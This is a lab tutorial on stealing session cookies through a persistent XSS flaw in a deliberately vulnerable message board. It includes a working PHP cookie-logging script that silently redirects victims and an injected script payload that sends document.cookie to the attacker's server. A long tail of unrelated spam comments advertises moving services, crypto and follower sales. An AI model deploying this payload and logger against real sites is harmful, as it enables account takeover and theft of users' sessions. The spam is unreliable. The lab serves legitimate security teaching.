Stealing Cookies with Persistent XSS
What You Need
- A Backtrack 5 machine, real or virtual. I used a BackTrack 5 R2 virtual machine.
Purpose
If a website has a Persistent XSS vulnerability, you can inject code and attack other users. We'll use this attack to steal a cookie.This sort of attack is used commonly to gain access to another person's acount on webmail or social network accounts.
Starting Apache
On your BackTrack Linux machine, at the#>
prompt, enter these commands followed by the Enter key:You should see the local address 0.0.0.0:80 in a State of LISTEN, as shown below:service apache2 restart
netstat -an | more
Testing PHP
At the#>
prompt, enter these commands followed by the Enter key:In nano, type in the code shown below:cd /var/www
nano test.php
<?php phpinfo(); ?>
Your screen should look like this:Press
Ctrl+X
, then press Y
, then press the Enter key. This saves your file.From the menu bar in the top left of the BackTrack desktop, click Applications, Internet, Firefox Web Browser.
In the Firefox address bar, enter
localhost/test.php
and then press the Enter key. You should see a PHP configuration page, as shown below:This verifies that Apache and PHP are running correctly.
If PHP doesn't work, try re-extracting BackTrack from the original 7-zip file.
Writing a Cookie-Storage PHP Script
The script we will use does these things:- When a user sends an HTTP GET request to this script with a parameter c, that parameter is stored in a file
- It will also store two other values: the IP address and the referring URL
- It will save this information in a file named cookies.html in the /tmp folder
- It will then return to the original page, so that the user has no idea that anything unusual has happened On your BackTrack linux machine, in a Terminal window, execute this command:
nano /var/www/steal.php
<?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date = date("j F, Y, g:i a"); $referer = getenv ('HTTP_REFERER'); $out = 'Cookie: ' . $cookie . "\n"; $out = $out . 'IP: ' . $ip . "\n"; $out = $out . 'Date: ' . $date . "\n"; $out = $out . 'Referer: ' . $referer . "\n\n"; $fp = fopen('/tmp/cookies.html', 'a'); fwrite($fp, $out); fclose($fp); header ("Location: http://games.samsclass.info"); ?> <HTML></HTML>
Save the file with Ctrl+X, Y, Enter.
Finding your Backtrack Linux Server's IP Address
Make sure your BackTrack Linux virtual machine is using Bridged networking, not NAT.If necessary, renew the IP address with the dhclient command.
In Backtrack, in Firefox, execute this command:
ifconfig
Testing the Cookie-Storage Script
On your host machine, (NOT the Backtrack machine), open a Web browser and go to this URL, replacing the IP address with the IP address of your Backtrack machine:http://192.168.5.36/steal.php?c=test123
If you made any errors typing in the script, you will see an error message telling you which line has a problem. Fix those problems and don't proceed to the next section until the PHP script is working.
Viewing the Stolen Data
In Backtrack, in Firefox, execute this command:cat /tmp/cookies.html
Viewing the Vulnerable Message Board
On your host system, open a Web browser and go to this page:http://games.samsclass.info/vulnphp/
This is a simple message board, using your name as an authentication cookie.In the "User ID Page", enter your name in the box, as shown below. (Don't use the literal string "YOUR NAME"--instead, use your own real name.
Click the Enter button.
On the next page, if any comments appear, click the "Erase Comments" button.
Enter this comment, replacing the IP address with the IP address of your BackTrack Linux server:
<script> document.location="http://192.168.5.36/steal.php?c=" + document.cookie </script>
Click the "Post Comment" button.
The page just stole your cookie, and it will continue to steal cookies from everyone who views it until someone clicks the "Erase Comments" button.
Viewing the Stolen Data
In Backtrack, in Firefox, execute this command:cat /tmp/cookies.html
https://bayanlarsitesi.com/
ReplyDeleteManisa
Denizli
Malatya
Çankırı
HUVR
adıyaman
ReplyDeletesakarya
yalova
tekirdağ
amasya
DUQR
adana evden eve nakliyat
ReplyDeleteafyon evden eve nakliyat
istanbul evden eve nakliyat
burdur evden eve nakliyat
gümüşhane evden eve nakliyat
Z7DHC
A44C2
ReplyDeleteHatay Lojistik
Kırşehir Evden Eve Nakliyat
Bolu Evden Eve Nakliyat
Kırıkkale Lojistik
Muş Parça Eşya Taşıma
0B94A
ReplyDeleteArg Coin Hangi Borsada
Lbank Güvenilir mi
Karabük Şehirler Arası Nakliyat
Gümüşhane Lojistik
Adana Şehir İçi Nakliyat
Niğde Evden Eve Nakliyat
Sincan Fayans Ustası
Tokat Şehir İçi Nakliyat
Keep Coin Hangi Borsada
supreme hoodie
ReplyDeleteoff white t shirt
palm angels clothing
jordan shoes
nike sb
kd 12
hermes outlet
spongebob kyrie 5
jordan outlet
curry 8
26989
ReplyDeleteCoin Nasıl Üretilir
Kripto Para Nedir
Loop Network Coin Hangi Borsada
Tumblr Beğeni Hilesi
Binance Referans Kodu
Tumblr Takipçi Satın Al
Discord Sunucu Üyesi Satın Al
Coin Çıkarma Siteleri
Bitcoin Nasıl Üretilir
0D55C
ReplyDeleteThreads Yeniden Paylaş Hilesi
Facebook Takipçi Hilesi
Coin Madenciliği Siteleri
Referans Kimliği Nedir
Clubhouse Takipçi Hilesi
Bitcoin Çıkarma Siteleri
Kripto Para Oynama
Facebook Sayfa Beğeni Hilesi
Soundcloud Takipçi Satın Al
38AE1
ReplyDeleteyearn
ledger wallet
poocoin
arbitrum
avax
eigenlayer
raydium
uwu lend
aave
9EA52
ReplyDeletePamukkale
Gaziemir
Kovancılar
Arıcak
Aziziye
Tuzlukçu
Oğuzeli
Dikmen
Demirköy
FHJYGNJYH
ReplyDeleteمكافحة الحشرات بالاحساء
شركة عزل اسطح بالمدينة المنورة bqUCrW0z2H
ReplyDeleteشركة عزل خزانات e3Kyc96iS6
ReplyDeleteنفخ المجاري بالاحساء casPAd7cck
ReplyDeleteشركة تسليك مجاري بخميس مشيط quJY6qvWr9
ReplyDeleteشركة صيانة افران بعنيزة
ReplyDeleteCFuMJZEG3
ocKcUw
DA2DA91C84
ReplyDeleteinstagram takipçi
شركة تنظيف مجالس بالجبيل BB63uC9DZr
ReplyDelete62673C9BCD
ReplyDeleteinstagram takipçi gönderme
4E8CB8A271
ReplyDeletetiktok en ucuz takipçi